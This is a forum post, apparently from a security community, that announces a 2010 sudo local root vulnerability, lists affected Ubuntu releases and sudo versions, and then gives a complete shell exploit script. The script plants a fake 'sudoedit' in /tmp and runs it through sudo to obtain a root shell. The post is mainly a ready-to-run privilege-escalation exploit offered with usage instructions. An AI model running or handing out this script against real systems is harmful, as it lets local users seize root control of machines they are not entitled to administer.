Jump to content
pyth0n3

Sudo local root exploit discovered by Slouching

Recommended Posts

Posted (edited)

Severity: HIGH

To see if your sudo is vulnerable type

sudo -V

The utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges.

Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.

Affected Products

Ubuntu 6.06 LTS

Ubuntu 8.04 LTS

Ubuntu 8.10

Ubuntu 9.04

Ubuntu 9.10

And also other Linux distribution that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4

---snip---
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
--snip---

cheers,
kingcope

Edited by pyth0n3
  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...